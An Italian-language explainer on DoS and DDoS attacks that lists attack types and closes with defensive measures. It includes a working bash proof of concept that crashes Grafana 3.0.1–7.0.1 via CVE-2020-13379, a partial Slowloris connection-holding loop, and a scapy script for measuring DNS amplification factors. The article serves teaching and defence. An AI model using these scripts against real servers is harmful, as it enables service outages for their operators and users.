Dos e DDoS

Gli attacchi DoS e DDoS possono avere impatti significativi sulle strutture colpite, tra cui:

• Blocco dei servizi: gli utenti autorizzati, dunque, non potranno più accedere ai servizi/sistemi con conseguente blocco della produttività/funzionalità.
• Perdita/Danneggiamento di dati: il blocco improvviso di un sistema può provocare, a determinate condizioni, perdite o danneggiamento dei dati

Esistono varie tipologie di attacchi DoS:

1. Attacchi volumetrici: questi attacchi si basano sull’invio di un numero elevato di richieste a un sistema in modo da sovraccaricarlo e renderlo inaccessibile.
2. Attacchi mirati all’esaurimento delle risorse: questi attacchi si basano sull’utilizzo eccessivo di una o più risorse del sistema puntando ad esaurirle e rendere, di conseguenza, inaccessibile il servizio/sistema (questo lo si può fare anche su di un server DNS: in questo caso si parla di DNS Flood Attack).
3. Exploit di vulnerabilità: sfruttare alcune vulnerabilità di alcuni componenti o funzioni del sistema può comportare il crash dell’applicativo/servizio.

Nel caso in cui l’attacco (volumetrico o mirato all’esaurimento delle risorse), venga effettuato da più dispositivi, si parla di attacco DDoS.

Prendiamo come esempio una vulnerabilità DoS afferente alle versioni da 3.0.1 a 7.0.1 di Grafana, la ben nota soluzione per la visualizzazione dati opensource.

Queste versioni sono affette da una vulnerabilità (CVE-2020-13379) di tipo SSRF (Server-Side Request Forgery) derivante da un incorretto controllo degli accessi (Improper Access Control) che consente ad un utente non autenticato di effettuare una richiesta HTTP circa gli avatar. Tale vulnerabilità, può essere utilizzata sia per ottenere informazioni utili ad altri attacchi sia a provocare un Denial of Service, nel caso in cui venga effettuata una richiesta contenente uno URL non valido.

Il Proof of Concept iniziale, realizzato nel 2020, è il seguente:

# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
# Date: 2020-05-23
# Exploit Author: mostwanted002
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 3.0.1 - 7.0.1
# Tested on: Linux
# CVE : CVE-2020-13379

#!/bin/bash

if [[ $1 != "" ]]; then
    curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
else
    echo "Usage: grafana-dos.sh <TARGET>.   Example: grafana-dos.sh http://localhost:3000"
fi

Eseguendo questo semplice codice, dunque, è possibile provocare un errore di Segmentazione nell’istanza di Grafana (non riesce dunque a gestire l’eccezione circa lo URL non corretto fornitogli) e provocare il crash dell’applicativo.

Un altro esempio d’attacco DoS è quello denominato “SlowLoris”. In questo caso particolare, anziché inviare al server quante più informazioni possibili, vengono aperte, in contemporanea, molteplici sessioni valide e queste vengono mantenute effettuando nuove richieste (con cadenza periodica) per mantenere riservate le relative risorse del sistema.

Il relativo codice di un exploit assomiglierà a questo:

for i in range(numero_sessioni_desiderate):
	try:
		s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.settimeout(timeout_desiderato)

		s.connect((ip,port))
		connessioni.append(s)
	except:
		break

while True:
	for s in connessioni:
		try:
			line = f"GET /?{random_number} HTTP/1.1"
			line = f"{line}\r\n".encode("utf-8")

			# Richiesta

		except socket.error:
			# Eccezione

Esistono diversi tipi di attacchi di amplificazione DoS, tra cui:

• Attacchi di amplificazione DNS: in questo tipo di attacco, l’attaccante invia un numero elevato di richieste di interrogazione DNS a un server DNS. Il server DNS risponderà a ogni richiesta inviando un numero elevato di pacchetti di risposta, che sovraccaricheranno il sistema di destinazione.
• Attacchi di amplificazione NTP: in questo tipo di attacco, l’attaccante invia un numero elevato di richieste di sincronizzazione NTP a un server NTP. Il server NTP risponderà a ogni richiesta inviando un numero elevato di pacchetti di risposta, che sovraccaricheranno il sistema di destinazione.
• Attacchi di amplificazione ICMP: in questo tipo di attacco, l’attaccante invia un numero elevato di richieste ICMP a un sistema. Il sistema risponderà a ogni richiesta inviando un numero elevato di pacchetti di risposta, che sovraccaricheranno il sistema di destinazione.

Per esempio, per effettuare un’amplificazione DNS, si potrebbe ricorrere a uno script di questo genere:

# Imports
from scapy.all import *
from pprint import pprint
import operator

# Parameters
interface = "eth0"                      # Interface you want to use
dns_source = "local-ip"                 # IP of that interface
dns_destination = ["ip1","ip2","ip3"]   # List of DNS Server IPs

time_to_live = 128                                                                 # IP TTL
query_name = "google.com"                                                          # DNS Query Name
query_type = ["ANY", "A","AAAA","CNAME","MX","NS","PTR","CERT","SRV","TXT", "SOA"] # DNS Query Types

# Initialise variables
results = []
packet_number=0

# Loop through all query types then all DNS servers
for i in range(0,len(query_type)):
    for j in range(0, len(dns_destination)):
        packet_number += 1

        # Craft the DNS query packet with scapy
        packet = IP(src=dns_source, dst=dns_destination[j], ttl=time_to_live) / UDP() / DNS(rd=1, qd=DNSQR(qname=query_name, qtype=query_type[i]))

        # Sending the packet
        try:
            query = sr1(packet,iface=interface,verbose=False, timeout=8)
            print("Packet #{} sent!".format(packet_number))
        except:
            print("Error sending packet #{}".format(packet_number))

        # Creating dictionary with received information
        try:
            result_dict = {
                'dns_destination':dns_destination[j],
                'query_type':query_type[i],
                'query_size':len(packet),
                'response_size':len(query),
                'amplification_factor': ( len(query) / len(packet) ),
                'packet_number':packet_number
            }
            results.append(result_dict)
        except:
            pass

# Sort dictionary by the amplification factor
results.sort(key=operator.itemgetter('amplification_factor'),reverse=True)

# Print results
pprint(results)

Il codice originale di questo script lo potete trovare su Github.

Come abbiamo visto, gli attacchi di amplificazione DoS possono essere molto dannosi e possono rendere inaccessibili i sistemi di destinazione per un lungo periodo di tempo. Per proteggersi da questi attacchi, è importante adottare una serie di misure di sicurezza, tra cui:

• Mantenere aggiornati i software
• Utilizzare firewall e altri sistemi di sicurezza (WAF, etc.)
• Monitorare il traffico di rete per rilevare anomalie.
• Gestire correttamente le eccezioni